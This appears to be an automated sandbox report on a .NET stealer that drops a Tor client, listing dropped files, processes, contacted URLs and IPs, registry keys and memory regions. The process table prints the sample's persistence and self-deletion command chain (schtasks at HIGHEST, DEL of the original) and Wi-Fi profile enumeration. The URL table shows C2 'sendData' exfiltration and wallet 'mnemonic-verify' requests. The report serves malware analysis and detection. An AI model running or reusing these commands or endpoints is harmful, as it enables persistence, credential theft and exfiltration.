Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
file.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libcrypto-1_1.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libevent-2-1-7.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libevent_core-2-1-7.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libevent_extra-2-1-7.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libgcc_s_sjlj-1.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libssl-1_1.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libssp-0.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\libwinpthread-1.dll
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\tor-gencert.exe
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\tor-real.exe
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\zlib1.dll
|
PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmp3D94.tmp
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\p.dat
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\report.lock
|
very short file (no magic)
|
modified
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\cached-certs (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\cached-certs.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\cached-microdesc-consensus (copy)
|
ASCII text, with very long lines (1006)
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\cached-microdesc-consensus.tmp
|
ASCII text, with very long lines (1006)
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\cached-microdescs.new
|
ASCII text, with very long lines (15714)
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\state (copy)
|
ASCII text, with very long lines (351), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\state.tmp
|
ASCII text, with very long lines (351), with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\unverified-microdesc-consensus (copy)
|
ASCII text, with very long lines (1006)
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\data\unverified-microdesc-consensus.tmp
|
ASCII text, with very long lines (1006)
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\geoip
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\geoip6
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\host\hostname (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\host\hostname.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\host\hs_ed25519_public_key (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\host\hs_ed25519_public_key.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\host\hs_ed25519_secret_key (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\host\hs_ed25519_secret_key.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\tor-bg.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\tor.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\torrc
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\torrc.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with very long lines (307), with CRLF line terminators
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators, with overstriking
|
dropped
|
There are 31 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\file.exe
|
"C:\Users\user\Desktop\file.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\file.exe"
/rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\file.exe"
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /create /tn "file" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\file.exe" /rl HIGHEST /f
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
"C:\Users\user\AppData\Local\Starlabs\file.exe"
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
C:\Users\user\AppData\Local\Starlabs\file.exe
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
C:\Users\user\AppData\Local\Starlabs\file.exe
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show profiles
|
||
C:\Windows\System32\cmd.exe
|
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
|
||
C:\Windows\System32\netsh.exe
|
netsh wlan show networks mode=bssid
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
C:\Users\user\AppData\Local\Starlabs\file.exe
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
C:\Users\user\AppData\Local\Starlabs\file.exe
|
||
C:\Users\user\AppData\Local\Starlabs\file.exe
|
C:\Users\user\AppData\Local\Starlabs\file.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\timeout.exe
|
timeout /t 3
|
||
C:\Users\user\AppData\Local\zfzs6gcqx8\tor\tor-real.exe
|
"C:\Users\user\AppData\Local\zfzs6gcqx8\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\zfzs6gcqx8\tor\torrc.txt"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr /R /C:"[ ]:[ ]"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\chcp.com
|
chcp 65001
|
||
C:\Windows\System32\findstr.exe
|
findstr "SSID BSSID Signal"
|
There are 14 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://104.161.33.60:8080
|
unknown
|
||
http://104.161.33.60:8080/mnemonic-verify/9632B569333595844815947611/CB82FF607F9FC43225429330EDBC46C9
|
104.161.33.60
|
||
https://blog.torproject.org/v2-deprecation-timelineCalled
|
unknown
|
||
https://blog.torproject.org/v2-deprecation-timeline
|
unknown
|
||
http://104.161.33.60:8080/sendData?pk=Q0I4MkZGNjA3RjlGQzQzMjI1NDI5MzMwRURCQzQ2Qzk=&ta=Qk9UX1BIQU5fQU5I&un=am9uZXM=&pc=MjI2NTMz&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ==
|
104.161.33.60
|
||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
|
unknown
|
||
http://104.161.33.60:8080/mnemonic-verify/9632B569333595844815947611/CB82FF607F9FC43225429330EDBC46C
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
http://185.217.98.121:80
|
unknown
|
||
https://138.2.92.67:443
|
unknown
|
||
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
|
unknown
|
||
https://github.com
|
unknown
|
||
http://167.235.70.96:8080
|
unknown
|
||
http://20.78.55.47:8080
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://www.torproject.org/
|
unknown
|
||
http://107.161.20.142:8080
|
unknown
|
||
https://5.196.181.135:443
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
|
unknown
|
||
https://bugs.torproject.org/tpo/core/tor/14917.
|
unknown
|
||
http://101.43.160.136:8080
|
unknown
|
||
https://192.99.196.191:443
|
unknown
|
||
https://blog.torproject.org/blog/lifecycle-of-a-new-relay
|
unknown
|
||
http://168.138.211.88:8099
|
unknown
|
||
http://ip-api.com/line?fields=query,country
|
208.95.112.1
|
||
http://www.w3.
|
unknown
|
||
http://104.161.33.60:80808
|
unknown
|
||
http://18.228.80.130:80
|
unknown
|
||
http://127.0.0.1:8395/
|
unknown
|
||
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
|
unknown
|
||
https://www.torproject.org/documentation.html
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
http://ip-api.com
|
unknown
|
||
https://freehaven.net/anonbib/#hs-attack06
|
unknown
|
||
http://185.217.98.121:8080
|
unknown
|
||
http://104.161.33.60:8080/sendData?pk=Q0I4MkZGNjA3RjlGQzQzMjI1NDI5MzMwRURCQzQ2Qzk=&ta=Qk9UX1BIQU5fQU
|
unknown
|
||
http://8.219.110.16:9999
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://8.216.92.21:8080
|
unknown
|
||
http://65.49.205.24:8080
|
unknown
|
||
https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9
|
unknown
|
||
http://47.96.78.224:8080
|
unknown
|
||
https://node.trezor.io
|
unknown
|
||
http://129.151.109.160:8080
|
unknown
|
||
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://147.28.185.29:80
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://154.9.207.142:443
|
unknown
|
||
http://127.0.0.1:21325/enumerate
|
unknown
|
||
http://209.38.221.184:8080
|
unknown
|
||
http://www.w3.or
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
http://206.166.251.4:8080
|
unknown
|
||
https://bugs.torproject.org/tpo/core/tor/21155.
|
unknown
|
||
http://194.164.198.113:8080
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
|
unknown
|
||
http://38.207.174.88:8080
|
unknown
|
||
http://ip-api.com/line?fields=query
|
unknown
|
||
http://159.203.174.113:8090
|
unknown
|
||
http://101.126.19.171:80
|
unknown
|
||
http://104.161.33.60:8080/sendData
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://185.217.98.121:443
|
unknown
|
||
http://46.235.26.83:8080
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
http://116.202.101.219:8080
|
unknown
|
||
http://127.0.0.1:
|
unknown
|
||
http://38.60.191.38:80
|
unknown
|
||
http://67.230.176.97:8080
|
unknown
|
||
https://objects.githubusercontent.com
|
unknown
|
||
https://www.torproject.org/download/download#warningalphabetaThis
|
unknown
|
||
http://mingw-w64.sourceforge.net/X
|
unknown
|
||
http://www.zlib.net/D
|
unknown
|
||
https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
|
unknown
|
||
https://sabotage.net
|
unknown
|
||
http://127.0.0.1:8395/Data
|
unknown
|
||
http://132.145.17.167:9090
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
http://104.161.33.60:80802m
|
unknown
|
||
https://www.openssl.org/H
|
unknown
|
||
http://51.159.4.50:8080
|
unknown
|
||
http://8.222.143.111:8080
|
unknown
|
||
https://www.torproject.org/download/download#warning
|
unknown
|
||
https://support.mozilla.org
|
unknown
|
||
https://5.196.181.135:443Pk
|
unknown
|
||
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
|
unknown
|
||
http://41.87.207.180:9090
|
unknown
|
||
https://bugs.torproject.org/tpo/core/tor/8742.
|
unknown
|
||
https://www.torproject.org/docs/faq.html#BestOSForRelay
|
unknown
|
||
http://crl.v
|
unknown
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
There are 84 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
github.com
|
140.82.121.4
|
||
ip-api.com
|
208.95.112.1
|
||
objects.githubusercontent.com
|
185.199.110.133
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
104.161.33.60
|
unknown
|
United States
|
||
81.83.37.138
|
unknown
|
Belgium
|
||
45.91.101.18
|
unknown
|
Germany
|
||
81.21.4.110
|
unknown
|
Ukraine
|
||
140.82.121.4
|
github.com
|
United States
|
||
208.95.112.1
|
ip-api.com
|
United States
|
||
185.233.107.110
|
unknown
|
Germany
|
||
81.17.25.195
|
unknown
|
Switzerland
|
||
51.255.106.85
|
unknown
|
France
|
||
131.188.40.189
|
unknown
|
Germany
|
||
68.67.32.32
|
unknown
|
Canada
|
||
176.9.38.121
|
unknown
|
Germany
|
||
185.199.110.133
|
objects.githubusercontent.com
|
Netherlands
|
||
127.0.0.1
|
unknown
|
unknown
|
There are 4 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\file_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1BF1C161000
|
trusted library allocation
|
page read and write
|
||
4E1D000
|
heap
|
page read and write
|
||
266D3593000
|
trusted library allocation
|
page read and write
|
||
2CB12B62000
|
heap
|
page read and write
|
||
2463B6AD000
|
trusted library allocation
|
page read and write
|
||
2463B9C4000
|
trusted library allocation
|
page read and write
|
||
1BF1C446000
|
trusted library allocation
|
page read and write
|
||
4BCA000
|
heap
|
page read and write
|
||
1A90000
|
heap
|
page read and write
|
||
4E32000
|
heap
|
page read and write
|
||
1C8ACFC0000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
2463B9CB000
|
trusted library allocation
|
page read and write
|
||
4DB8000
|
heap
|
page read and write
|
||
1D6C7645000
|
heap
|
page read and write
|
||
4A9C000
|
heap
|
page read and write
|
||
1B6E000
|
heap
|
page read and write
|
||
63BB000
|
heap
|
page read and write
|
||
27569570000
|
heap
|
page execute and read and write
|
||
1BF2CFC8000
|
trusted library allocation
|
page read and write
|
||
15B55740000
|
heap
|
page read and write
|
||
4B17000
|
heap
|
page read and write
|
||
3B25000
|
heap
|
page read and write
|
||
5275000
|
heap
|
page read and write
|
||
3AB5000
|
heap
|
page read and write
|
||
45FB000
|
heap
|
page read and write
|
||
1BF2C262000
|
trusted library allocation
|
page read and write
|
||
3A99000
|
heap
|
page read and write
|
||
1BF2D844000
|
trusted library allocation
|
page read and write
|
||
1BF1C5EF000
|
trusted library allocation
|
page read and write
|
||
49E7000
|
heap
|
page read and write
|
||
D7988FF000
|
stack
|
page read and write
|
||
4A7A000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
3AD3000
|
heap
|
page read and write
|
||
4385000
|
heap
|
page read and write
|
||
4A4E000
|
heap
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
6371000
|
heap
|
page read and write
|
||
1BF1A8D0000
|
trusted library allocation
|
page read and write
|
||
4D56000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1BF1C49B000
|
trusted library allocation
|
page read and write
|
||
1C8AEE99000
|
trusted library allocation
|
page read and write
|
||
51FA000
|
heap
|
page read and write
|
||
CF5B36E000
|
stack
|
page read and write
|
||
1C8AE940000
|
heap
|
page read and write
|
||
1BF34EED000
|
heap
|
page read and write
|
||
2250047F000
|
trusted library allocation
|
page read and write
|
||
C8DFF3B000
|
stack
|
page read and write
|
||
1BF2C23D000
|
trusted library allocation
|
page read and write
|
||
1BF1C695000
|
trusted library allocation
|
page read and write
|
||
27567EB5000
|
heap
|
page read and write
|
||
1BF2DFB7000
|
trusted library allocation
|
page read and write
|
||
1C8AEE73000
|
trusted library allocation
|
page read and write
|
||
266D15B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
94CB3FD000
|
stack
|
page read and write
|
||
6C1C0000
|
unkown
|
page readonly
|
||
5176000
|
heap
|
page read and write
|
||
1BF2DF8E000
|
trusted library allocation
|
page read and write
|
||
1C8ACD0C000
|
heap
|
page read and write
|
||
1AD13370000
|
heap
|
page read and write
|
||
2250002F000
|
trusted library allocation
|
page read and write
|
||
286003A3000
|
trusted library allocation
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
1B45000
|
heap
|
page read and write
|
||
3AB9000
|
heap
|
page read and write
|
||
27567A40000
|
heap
|
page read and write
|
||
452E000
|
heap
|
page read and write
|
||
1BF2CFA5000
|
trusted library allocation
|
page read and write
|
||
1BF1A76C000
|
heap
|
page read and write
|
||
6654000
|
heap
|
page read and write
|
||
22500093000
|
trusted library allocation
|
page read and write
|
||
6C671000
|
unkown
|
page execute read
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
BD951FA000
|
stack
|
page read and write
|
||
E5145FF000
|
stack
|
page read and write
|
||
62F1000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
1BF34980000
|
trusted library section
|
page read and write
|
||
1C8AEE89000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
1BF2D812000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
3A91000
|
heap
|
page read and write
|
||
1C8AEB53000
|
trusted library allocation
|
page read and write
|
||
4BD7000
|
heap
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
1BF2D796000
|
trusted library allocation
|
page read and write
|
||
1AD13605000
|
heap
|
page read and write
|
||
1BF2D7D9000
|
trusted library allocation
|
page read and write
|
||
3AD4000
|
heap
|
page read and write
|
||
49E6000
|
heap
|
page read and write
|
||
3AB2000
|
heap
|
page read and write
|
||
1AD1333A000
|
heap
|
page read and write
|
||
CCB927C000
|
stack
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
431F000
|
stack
|
page read and write
|
||
4BF1000
|
heap
|
page read and write
|
||
2464B681000
|
trusted library allocation
|
page read and write
|
||
266D358D000
|
trusted library allocation
|
page read and write
|
||
3AA2000
|
heap
|
page read and write
|
||
28600013000
|
trusted library allocation
|
page read and write
|
||
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
43B6000
|
heap
|
page read and write
|
||
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
28600081000
|
trusted library allocation
|
page read and write
|
||
2860047D000
|
trusted library allocation
|
page read and write
|
||
3AAF000
|
heap
|
page read and write
|
||
1C8AD1C5000
|
heap
|
page read and write
|
||
1BF1A650000
|
heap
|
page read and write
|
||
5474000
|
heap
|
page read and write
|
||
1BF2C25B000
|
trusted library allocation
|
page read and write
|
||
1BF2C867000
|
trusted library allocation
|
page read and write
|
||
1BF1C3F4000
|
trusted library allocation
|
page read and write
|
||
1F65000
|
heap
|
page read and write
|
||
266D15C0000
|
heap
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
C27DCFE000
|
stack
|
page read and write
|
||
27567B10000
|
heap
|
page read and write
|
||
2257ABA0000
|
heap
|
page execute and read and write
|
||
3AB8000
|
heap
|
page read and write
|
||
1BF2CA25000
|
trusted library allocation
|
page read and write
|
||
1C8AEB30000
|
heap
|
page execute and read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
2463B70D000
|
trusted library allocation
|
page read and write
|
||
2463B6FF000
|
trusted library allocation
|
page read and write
|
||
266D15EA000
|
heap
|
page read and write
|
||
4BD7000
|
heap
|
page read and write
|
||
4B17000
|
heap
|
page read and write
|
||
22500011000
|
trusted library allocation
|
page read and write
|
||
3ABF000
|
heap
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
24639B2F000
|
heap
|
page read and write
|
||
BD93FBE000
|
stack
|
page read and write
|
||
22500081000
|
trusted library allocation
|
page read and write
|
||
6C274000
|
unkown
|
page readonly
|
||
55F6000
|
heap
|
page read and write
|
||
6619000
|
heap
|
page read and write
|
||
4501000
|
heap
|
page read and write
|
||
4CD2000
|
heap
|
page read and write
|
||
4BBA000
|
heap
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
4448000
|
heap
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
3A93000
|
heap
|
page read and write
|
||
6333000
|
heap
|
page read and write
|
||
1820000
|
heap
|
page read and write
|
||
3A91000
|
heap
|
page read and write
|
||
4BDC000
|
heap
|
page read and write
|
||
1BF1A620000
|
heap
|
page read and write
|
||
1BF2C84A000
|
trusted library allocation
|
page read and write
|
||
6C1F0000
|
unkown
|
page readonly
|
||
225792F5000
|
heap
|
page read and write
|
||
5134000
|
heap
|
page read and write
|
||
E5140FF000
|
stack
|
page read and write
|
||
CF5B7FF000
|
stack
|
page read and write
|
||
4AEE000
|
heap
|
page read and write
|
||
22579120000
|
heap
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
27567A20000
|
heap
|
page read and write
|
||
1BF34D0D000
|
heap
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
2463B70B000
|
trusted library allocation
|
page read and write
|
||
526D000
|
heap
|
page read and write
|
||
266D1980000
|
heap
|
page read and write
|
||
2867CC05000
|
heap
|
page read and write
|
||
1BF2D80A000
|
trusted library allocation
|
page read and write
|
||
2867C915000
|
heap
|
page read and write
|
||
1BF2D7F6000
|
trusted library allocation
|
page read and write
|
||
4385000
|
heap
|
page read and write
|
||
1BF1C7E1000
|
trusted library allocation
|
page read and write
|
||
4BF0000
|
heap
|
page read and write
|
||
1206000
|
unkown
|
page readonly
|
||
3ACA000
|
heap
|
page read and write
|
||
4DDB000
|
heap
|
page read and write
|
||
1BF1C835000
|
trusted library allocation
|
page read and write
|
||
6C1C1000
|
unkown
|
page execute read
|
||
27569F53000
|
heap
|
page read and write
|
||
1206000
|
unkown
|
page readonly
|
||
4340000
|
heap
|
page read and write
|
||
4360000
|
heap
|
page read and write
|
||
27567AD0000
|
heap
|
page read and write
|
||
1BF2D790000
|
trusted library allocation
|
page read and write
|
||
BD944FF000
|
stack
|
page read and write
|
||
1C8ACCEB000
|
heap
|
page read and write
|
||
2867CAE0000
|
trusted library allocation
|
page read and write
|
||
1BF1C2B3000
|
trusted library allocation
|
page read and write
|
||
C27E3FE000
|
stack
|
page read and write
|
||
6C4B3000
|
unkown
|
page readonly
|
||
4382000
|
heap
|
page read and write
|
||
286003ED000
|
trusted library allocation
|
page read and write
|
||
1BF2D1D0000
|
trusted library allocation
|
page read and write
|
||
3AB8000
|
heap
|
page read and write
|
||
28600355000
|
trusted library allocation
|
page read and write
|
||
495E000
|
heap
|
page read and write
|
||
4B4D000
|
heap
|
page read and write
|
||
1BF1C455000
|
trusted library allocation
|
page read and write
|
||
563F000
|
heap
|
page read and write
|
||
5354000
|
heap
|
page read and write
|
||
28115650000
|
heap
|
page read and write
|
||
5271000
|
heap
|
page read and write
|
||
148E4D10000
|
heap
|
page read and write
|
||
4A72000
|
heap
|
page read and write
|
||
65EF000
|
heap
|
page read and write
|
||
3A9E000
|
heap
|
page read and write
|
||
148E6690000
|
heap
|
page read and write
|
||
1BF1C427000
|
trusted library allocation
|
page read and write
|
||
1BF1C3F0000
|
trusted library allocation
|
page read and write
|
||
1C8AEBC3000
|
trusted library allocation
|
page read and write
|
||
1BF2C81E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
BD952FB000
|
stack
|
page read and write
|
||
1BF2C1E6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
C1169FD000
|
stack
|
page read and write
|
||
6C780000
|
unkown
|
page readonly
|
||
1BF2C2DC000
|
trusted library allocation
|
page read and write
|
||
2463B709000
|
trusted library allocation
|
page read and write
|
||
3AB2000
|
heap
|
page read and write
|
||
6E506FF000
|
stack
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
22500013000
|
trusted library allocation
|
page read and write
|
||
43A4000
|
heap
|
page read and write
|
||
4529000
|
heap
|
page read and write
|
||
3AC0000
|
heap
|
page read and write
|
||
1F60000
|
heap
|
page read and write
|
||
7FFD9B929000
|
trusted library allocation
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
4492000
|
heap
|
page read and write
|
||
2CB12C10000
|
heap
|
page read and write
|
||
22578FBA000
|
heap
|
page read and write
|
||
3AC9000
|
heap
|
page read and write
|
||
3ABF000
|
heap
|
page read and write
|
||
3AA5000
|
heap
|
page read and write
|
||
7FFD9B7A4000
|
trusted library allocation
|
page read and write
|
||
65EC000
|
heap
|
page read and write
|
||
4340000
|
heap
|
page read and write
|
||
1BF2D7C0000
|
trusted library allocation
|
page read and write
|
||
28600011000
|
trusted library allocation
|
page read and write
|
||
2860034D000
|
trusted library allocation
|
page read and write
|
||
1C8ACFC5000
|
heap
|
page read and write
|
||
